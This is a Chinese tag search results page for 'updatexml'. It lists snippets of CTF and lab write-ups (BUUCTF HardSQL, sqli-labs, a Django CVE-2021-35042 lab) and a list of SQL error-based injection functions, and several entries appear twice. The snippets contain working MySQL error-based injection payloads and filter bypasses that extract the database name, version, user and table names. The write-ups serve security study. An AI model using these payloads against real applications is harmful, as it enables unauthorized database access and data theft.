搜索结果
查询Tags标签: updatexml,共有 24条记录-
Vulfocus靶场 | Django SQL注入(CVE-2021-35042)
漏洞复现 这题通关比较简单,但是django这个漏洞还挺出名的,之前在ctf上也遇到过相关的题目\ 直接按照提示,进入了Django报错页面 flag就在里面,直接ctrl+F就能找到 爆数据库版本 order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1)%2…
2022/8/22 2:24:03 人评论 次浏览 -
buuctf | [极客大挑战 2019]HardSQL
时间:August 8 2022 经过测试发现闭合用单引号 过滤了空格等字符和sql关键词,用%20、%0a、/**/来绕过都不行fuzzing一下,看有哪些关键词和字符被过滤了: import requestswith open(Sql.txt) as f:for line in f:line = line.replace(\n,)url = fhttp://4eaf0972-f579-…
2022/8/9 2:22:57 人评论 次浏览 -
BUUCTF[极客大挑战 2019]HardSQL
1、burpsuit抓包,跑一下fuzz发现长度为736的都被过滤掉了2、观察error界面,猜测应该是报错注入 先爆数据库名1 adminor(updatexml(1,concat(0x7e,database(),0x7e),1))#、0x7e代表~得到数据库名geek 3、爆表名1 adminor(updatexml(1,concat(0x7e,(select(table_name)fro…
2022/7/23 2:22:42 人评论 次浏览 -
[极客大挑战 2019]HardSQL
[极客大挑战 2019]HardSQL 先用一下常规payload发现应该是被过滤了用字典爆破发现这些字符的回显都是相同的根据错误,猜测是报错注入,(这里不是很明白怎么看出是报错注入的),有会的师傅可以评论一下然后我们尝试使用报错注入的payload: 1or(updatexml(1,concat(0x7e…
2022/7/17 2:15:04 人评论 次浏览 -
SQL注入之updatexml()报错注入
SQL注入之updatexml()报错注入 updatexml()函数 使用前提在mysql高版本中(大于5.1版本)中添加了对XML文档进行查询和修改的函数,updatexml(),extracvalue()而显示错误则需要在开发程序中采用print_r mysql_error()函数,将mysql错误信息输出。 函数本身作用:改变文档中符…
2022/1/30 2:34:15 人评论 次浏览 -
buuctf:[极客大挑战 2019]HardSQL
打开链接,直接手工尝试注入,发现将and,union,=等过滤掉了 尝试一波报错注入 ?username=1or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=1 发现存在报错注入,那么接下来查看当前数据库 ?username=1or(updatexml(1,concat(0x7e,database(),0x7e)…
2021/11/6 19:14:49 人评论 次浏览 -
buuctf:[极客大挑战 2019]HardSQL
打开链接,直接手工尝试注入,发现将and,union,=等过滤掉了 尝试一波报错注入 ?username=1or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=1 发现存在报错注入,那么接下来查看当前数据库 ?username=1or(updatexml(1,concat(0x7e,database(),0x7e)…
2021/11/6 19:14:49 人评论 次浏览 -
2021年10月10日16点53分 SQL常用十大报错函数
1.floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extractvalue() id = 1 and (extractvalue(1, concat(0x5c,(select user())))); 3.updatexml() id = 1 and (updatexml(0x3…
2021/10/10 19:14:09 人评论 次浏览 -
2021年10月10日16点53分 SQL常用十大报错函数
1.floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extractvalue() id = 1 and (extractvalue(1, concat(0x5c,(select user())))); 3.updatexml() id = 1 and (updatexml(0x3…
2021/10/10 19:14:09 人评论 次浏览 -
Sqli labs less 60
1.常规方法测试 2.根据错误信息判断闭合方式为")–+,并且为字符型注入 3.查看当前库 ?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 4.查看库下的所有表88IVGFZVAY ?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_…
2021/9/26 19:11:22 人评论 次浏览 -
Sqli labs less 60
1.常规方法测试 2.根据错误信息判断闭合方式为")–+,并且为字符型注入 3.查看当前库 ?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 4.查看库下的所有表88IVGFZVAY ?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_…
2021/9/26 19:11:22 人评论 次浏览 -
SQL注入显错注入-HEAD1
SQL注入显错注入-HEAD1head注入 显错注入 数据库报错有很多种 有一些是致命的,有一些是简单报错 使用 update(目标xml内容,xml文档里的路径,更新的内容) updatexml(1,concat(0x7e,(select database())),1),1) >=0x是十六进制 (select database是一个子查询) 0x7e…
2021/9/10 19:06:37 人评论 次浏览 -
SQL注入显错注入-HEAD1
SQL注入显错注入-HEAD1head注入 显错注入 数据库报错有很多种 有一些是致命的,有一些是简单报错 使用 update(目标xml内容,xml文档里的路径,更新的内容) updatexml(1,concat(0x7e,(select database())),1),1) >=0x是十六进制 (select database是一个子查询) 0x7e…
2021/9/10 19:06:37 人评论 次浏览 -
sqli-labs:less-27 绕过过滤狗
好狗好狗 百般尝试 最后的payload http://127.0.0.1/sqli/Less-27/?id=1%27and(updatexml(1,concat(0x7e,(database()),0x7e),1))and%271
2021/9/4 19:06:14 人评论 次浏览 -
sqli-labs:less-27 绕过过滤狗
好狗好狗 百般尝试 最后的payload http://127.0.0.1/sqli/Less-27/?id=1%27and(updatexml(1,concat(0x7e,(database()),0x7e),1))and%271
2021/9/4 19:06:14 人评论 次浏览